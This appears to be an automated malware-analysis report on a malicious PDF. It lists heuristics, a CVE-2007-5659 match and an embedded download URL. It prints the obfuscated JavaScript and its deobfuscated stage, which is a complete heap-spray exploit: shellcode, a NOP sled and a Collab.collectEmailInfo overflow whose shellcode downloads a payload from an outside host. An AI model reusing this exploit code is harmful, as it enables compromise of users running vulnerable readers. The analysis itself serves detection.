Verdict: MALICIOUS
Risk Score: 308
MITRE ATT&CK: T1059.001 PowerShell
Malware Insights
The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted artifact 'javascript_obj0013_001.js' also shows signs of script obfuscation. The script's purpose is likely to download and execute a second-stage payload, although the exact details are obscured.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low, 3 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: the first line of the extracted script javascript_obj0013_001.js (see its preview below).
- PDF exploit shellcode contains an embedded download URL (high, rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://google-moogle.net/fiesta/load.php?id=30417&spl=4 (referenced by PDF JavaScript).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x369 | 6502 bytes |

SHA-256: abf89e9df60354361598bb2a08c4118ba16085b7b3ad2f10d019f9ef7643ece0
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 171 of 242 identifiers look randomly generated (e.g. 'NyBZD9G5SCBZyy7czyBZFkhcNyBZ'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
function ikOQaZLS3Mt(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function Y3vtI3YIDR3U(pEWpOGwe){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(pEWpOGwe)"+";"+"}");eval("function tvdBway62lG(HWzwkN){var R8FXvM3ZPrqM="+"0,fjVDtJxm=HWzwkN.l"+"en"+"gth,SohQjLcgvalx=10"+"2"+"4,UpSYp,SDXhw3vq,gdxfRf7A1iqwJ='',Heej8DYWWl4Di7=R8FXvM3ZPrqM,FS2BQhd6nn=R8FXvM3ZPrqM,He4oGwTvga=R8FXvM3ZPrqM,O7e1Asj=Ar"+"ra"+"y(63,16,57,34,8,22,5,37,48,29,0,0,0,0,0,0,15,17,51,45,28,1,46,2,38,47,32,52,55,39,40,13,33,30,62,24,43,49,14,11,21,12,26,0,0,0,0,58,0,19,59,9,7,56,0,50,53,6,54,60,10,36,31,25,42,61,4,18,27,3,20,23,35,44,41);f"+"o"+"r(SDXhw3vq=M"+"at"+"h.c"+"ei"+"l(fjVDtJxm/"+"SohQjLcgvalx)"+";SDXhw3vq>R8FXvM3ZPrqM;SDXhw3vq-"+"-){fo"+"r(UpSYp=Ma"+"th.m"+"in(fjVDtJxm,SohQjLcgvalx);UpSYp>R8FXvM3ZPrqM;UpSYp-"+"-,fjVDtJxm-"+"-){He4oGwTvga|"+"=(O7e1Asj[HWzwkN.cha"+"rCod"+"eAt(Heej8DYWWl4Di7+"+"+)-48])<"+"<FS2BQhd6nn;if(FS2BQhd6nn){gdxfRf7A1iqwJ+"+"=Y3vtI3YIDR3U"+"(30^He4oGwTvga&"+"2"+"5"+"5);He4oGwTvga>"+">="+"8;FS2BQhd6nn-"+"="+"2;}el"+"se{FS2BQhd6nn="+"6"+";}}"+"}return (gdxfRf7A1iqwJ);}var 
IIj4U=implode('',['RJjn','y2x9yA6Alq','hWk9L5cOdAy','eB','4RfL','Qz2BwyUjnMoBO7euQTEwnp9wD8','2aZi9MoZzKvb','z3Oy7','Koaqv','nX','9','XZpOwlp67YRShZko','w','Zo','9x','@7','2','aZj9MDb2xOy7K','oaq','vn','X9XZpOwlp66YgCdD2z','H9K8345Cin','j755Lvitc','9jv','@hwXw','7HZB73','ZA','2aOxeutc9jv@hwXw7HZ','B73ZA','XgSR85sMOha','q','XhXzzjDzN5vRY3@y7','K','oa','qvnX9XZpOw','lp6','6YCCin','Czit','L','EwQ','je3','Y','5Cin','j755U','8gO','7eutbz','jZyEM@y7K','oaqvnX9XZpO','wlp6','X','cRY','H@eCiD','qzj9UEM@O','A','iljhvaa7rvjDx@72uZ0UH@9ch9l9H@xe','xWH2snFKMWq2','sn7eu','Z0UH','@IP5Zdhgtzhioyz','m9','RY3@T','ELQChLnFCMOk','y','BZ','pK3lC','yBZpK3lCyBZpK3','lCyBZFJh5DCB','ZCK','glDCBZN','JswMyB','ZHeGwMyBZHe','3W','I','y','BZtPX','WCyBZt','U','3lCyBZ','tU6','5nCBZt','o3WTyBZSP','h5','9C','B','ZSP65','SCBZH8X','lSC','BZ','ZP7ltCBZ','tP','h5SCBZNNg','5SCB','Z','thgwSC','BZ','MJ6lpyBZp8G5C','yBZMJ','6lp','yBZNyh5z','yBZtP7WC','yB','ZtP','h','5DC','BZNNg5SCBZD93','WCyBZNk','3','cz','yBZtqgwIy','BZFm3','WC','y','BZtPhWIyBZ','tPh5','S','CBZnq6','lNyBZD9','g','5','DCBZz','m3czyBZ','NygWIyBZFmg','5I','y','BZtPh','WSC','BZtPh5','SCBZnq6lNyBZD','9g5zyBZ9q7c','zyB','ZIegl','SCBZFmGWZ','CB','ZtP7WZC','BZtPh5S','C','BZn','q6lNyBZD9g5CyBZFe3czyB','ZFJ','6WIyBZFm3cSCBZtPXWD','C','BZt','Ph5S','CBZnq6l','NyBZD9G5SCBZyy7czyBZFkhcNyBZ','Fm','glzyB','Zt','P','6WM','yBZtPh','5SCBZnq6lNyBZnP65DCBZZ7Gl','SCBZ','Mk','6W9CBZNJ','g','WTy','BZS7','gwnCBZto3','WNy','B','ZtPh5tCBZD','qg','5SCBZM','k6','l','NyB','ZNNswDCBZtUhw','nC','BZt','C7cTy','BZ','N','NGwNyB','ZS7Gwn','CBZ','F','m','GwMy','BZt','P6l','py','BZtPh','5SCB','ZHmG','wS','CBZSC','35My','BZM','JXw','Fy','BZz','S3WzyBZtPh5SCBZ','NJ','g','5SCB','ZShgwnCBZyk','6l','pyBZyJ6l','9CBZNJGwSCBZ','9Phw','n','CBZI','e','3czyBZtPh5SCBZDPh5','SCBZ','nq6l','pyBZHy','G5D','CBZDPg5ZCBZDq6','l','p','yBZ','F','mG5z','yBZtP','7ctCB','ZtPh5SCBZnqh59C','BZy','S','swSCBZDhg5SCBZ9qgcIyBZ','yS3cnCBZtUhwSCBZH','khcz','yBZtP','h5S','CBZMkhWF','yBZ','NNswS','C','BZthgwnC
','BZtC7cTyBZN','NGwNy','BZS7GwnCBZ','nP7WzyBZ','tPh5','SCB','ZH','yg5S','CBZD','7g','5Hy','BZnq','h59CBZZ','hXwDCB','ZDhXWpyB','ZIeGw9C','B','Z9P','hc','n','CB','ZD','h','6wSCBZ','nq6l','p','y','BZ','HyG5C','yBZDPg5nC','BZDq6lpy','BZFmG5','zyBZ','tPXw','9CBZtPh','5SCBZtP7cTyBZMkhWFy','BZNN','s','wSC','B','Zt7gwn','CBZtz7cTyB','ZNNGwNyBZ','S7GwnCBZSP7WzyB','ZtPh5SCBZHyg5','SCBZNNgWF','yB','Z','SPhwnCB','ZtC7cT','yBZNNGwNyBZS7Gwn','CB','ZtP7WzyBZtPh5SCBZnCh5SCBZD','z6wpyBZFyh59','CBZFyh59CBZFyh59','CBZFyh5','9CBZFKGl9CBZDCg5','D','C','B','ZNNGw9CBZFN','XW','T','yBZD','zh','WHyBZ','FJhWFyBZN','NGwnCBZNN','3WCyBZ','t','7gcyy','BZDU','Glpy','BZD','9g5CyBZMK6lpyBZN','N','35CyBZSqg','cDCBZthhczy','BZD','9','g','W9C','B','Z','MDGlpy','BZth','XwSCBZZhhW9CBZnPG','WNyB','Zp8gwtCBZy','K','h59C','BZ','Zh6','wM','yBZt2gW','MyB','ZSP','hlI','yBZIN7','5','TyBZt7g','cDCBZyk','G','WtCBZ','thh','5yyBZnPh','W','ZCBZIy7','WpyBZIk35','pyBZ','Mk6','w','IyB','Z','DC3W','n','C','BZF','NGl','pyBZDCGl','pyBZt','hXwDC','B','ZHDs','WyyBZthG','lpyBZNNgwpyBZ','S','hG','wTyBZC8g59CBZt','U','6lpyBZth6lpyBZ','DqGWnCBZyN','6w','yyB','Z','tPh','5zyBZI87WzyBZIegW','IyBZ','DqhWFyBZnhGwZCBZn2gwyyBZt','PhwIyBZzNGlH','yBZzeslpyB','ZyJX','WnCBZNmGWSCBZNJ6lS','CBZNK','6lzyBZyN6','lTy','BZNJ6lZCBZ','NmGlSCBZNyGl9CBZNy','6WtC','BZzNGlT','yBZNJGWSCBZNyGlM','yB','ZzN','slCyB','ZyJ6lIyBZNJ6','l9C','BZNNGl','IyBZzeG','WtCBZz','eGlH','yBZN','DsWSCBZCN','6l','pyBZCe','sWCy','BZCksW','py','BZ','y','JsWzyBZzes','lC','yBZCN','6l','9CB','ZFesWp8BO','7euZ0U','H@9qK','5z','NKWRY3@FSHlFe3','WFes','cRJjny2Bo','dPs5','Wo55aUm@xe','BtN7jACk','5ZC','AitlodYgCd','D2z','H9R1x@yv3@NqdtR','Sh','ZkowZo2B4RK','hat73sI','eBYR','SB','odPs5Wo55aU','vO','FS','5W','HDacR','Jjny2utc9','jv@','hwX','w7HZB73ZA2B4RyiD','b','h5n02jQ','j8BVT93','WMegVT93WMeG@L','v3@y7','KoaqvnX9XZpOw','lp67@xeaZi9MoZzK','vbz3Oy7K','oaqvnX','9X','Z','pOwlp6','7YRShZkow','Zo9ac','RJj','ny','2xADEwaT','AM@x','exO9ch9l9H','@BexWH','z3WFe','3WFDaY9qK5','zNKW7euQUUH
@j','Jjny2u','DF969N','qGw','AO79g9L4FvGDF96','9NqGwAO79g9M4iU6DOC','i','97fM','twA','dZI','8','XvaoMDLX','aO','L','e','aoRSdtvA','msnqGnL','CXsB','ArW6EMtwAdZI8X','vao','MDLO','m@x','eutc9jv@hw','Xw7HZB7','3Z','A2aORk','iZz9vWI75tmUH','sjX3@x2BSR','J','LZ8hMZL6d','DR8McUEMZjDx@72','uZ0','UH@1U3oB','9ga','BUht','s2','B4RkMt','FEuZL','CwZbUisbU5tL6dD8N5DOzit','LEwQ','jDa','c','Rf6WHOL','c@','OdwIc7@xe','u','vyS','jDMkKDDq','H','v88jQFcLnqCMOU4m','5UmMYk8BO7','euZ0UH@','OqH5','A','hhQRY3@','8CwZR','k','6tyqLojf6WHOLc@','Od','wIc6Yq','oLn','yq7Zj','e','gOg','f6WHOL','c@','OdwIc6YqoLny','q7ZjkgOgf6WHOL','c@','OdwIc6Y','qoL','nyq7','Zj8gOLv','3@LPM@jSaaI','zXv9CwAFYm@','xY3@HeuVee','xOjKK','tZ6XwbXKWu2','B4','x','eBWRJuVR','KKt','Z6Xw','bX','rWu2','x4R8gOR4H','SRKKtZ','6XwbXKWu2x','4RkgOLexS32xOO','qH5','Ah','hQ62g1RY','g4Rm3@eJx','@OqH5Ah','hQ6qg1','R','43@IDx@3cH@','jKKt','Z6','Xwb','XmWu2x4RmgOLeaoRKr','oNSw','aOO','Xs','1oBO7euZ','0UH@D2','HWUAM','Z','5','2H@xe','BZ8C','wt','qqM','tbou@byHWq2snby','HW','q2snk','Da','cRmH9Lc','LQj','87tFr','d9','po7t84LQ87M','Zj2x4RN3lMyGW','L','euwF2sDKzHXF2aOxeuwF','2','s','DKzHXF','X3@poL9CEanUcM','D0Uwa','p6dtb2B4RKXDgc','L','nkE','a','nUcMDbhMZ','t','OLnLc','LX8PwDjv5','tTUd9me','u@k4BDC7dcR','8','7tFrd9po','7tx9acRYH','@x2unHr','dDpoBO','7f']);");eval(tvdBway62lG(IIj4U));}

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x369 | 2611 bytes |

SHA-256: 1bfad55ced9ebfa0a451ec6e40cf5b98dcf3acebfcb543569bbd42d5c2f57337
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
var hrJZTA1biEWmZ2 = new Array(); function wXixDTMe4(rWyMQcKIwtm7tO, HubhwG) { while (rWyMQcKIwtm7tO.length*2<HubhwG){rWyMQcKIwtm7tO += rWyMQcKIwtm7tO;} rWyMQcKIwtm7tO = rWyMQcKIwtm7tO.substring(0,HubhwG/2); return rWyMQcKIwtm7tO; } function Sz6hSSMWN() { var CLiTy = 0x0c0c0c0c; var qvwY3qwszrTh = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var CQE7T1 = 0x400000; var yY6GUxGMR = qvwY3qwszrTh.length * 2; var HubhwG = CQE7T1 - (yY6GUxGMR+0x38); var rWyMQcKIwtm7tO = unescape("%u9090%u9090"); rWyMQcKIwtm7tO = wXixDTMe4(rWyMQcKIwtm7tO, HubhwG); var XBnSuj = (CLiTy - 0x400000)/CQE7T1; for (var 
npIjv1BOMhli=0;npIjv1BOMhli<XBnSuj;npIjv1BOMhli++) { hrJZTA1biEWmZ2[npIjv1BOMhli] = rWyMQcKIwtm7tO + qvwY3qwszrTh; } } function b8ont() { var N2xm9QmBqL = app.viewerVersion.toString(); N2xm9QmBqL = N2xm9QmBqL.replace(/\D/g,""); var SqDOCe = new Array(N2xm9QmBqL.charAt(0),N2xm9QmBqL.charAt(1),N2xm9QmBqL.charAt(2)); if ((SqDOCe[0] == 8 && ((SqDOCe[1] == 1 && SqDOCe[2] < 2) || SqDOCe[1] < 1)) || (SqDOCe[0] == 7 && SqDOCe[1] < 1) || (SqDOCe[0] < 7)) { Sz6hSSMWN(); var Bp0ojtHp = unescape("%u0c0c%u0c0c"); while(Bp0ojtHp.length < 44952) Bp0ojtHp += Bp0ojtHp; this.collabStore = Collab.collectEmailInfo({subj: "",msg: Bp0ojtHp}); } } b8ont();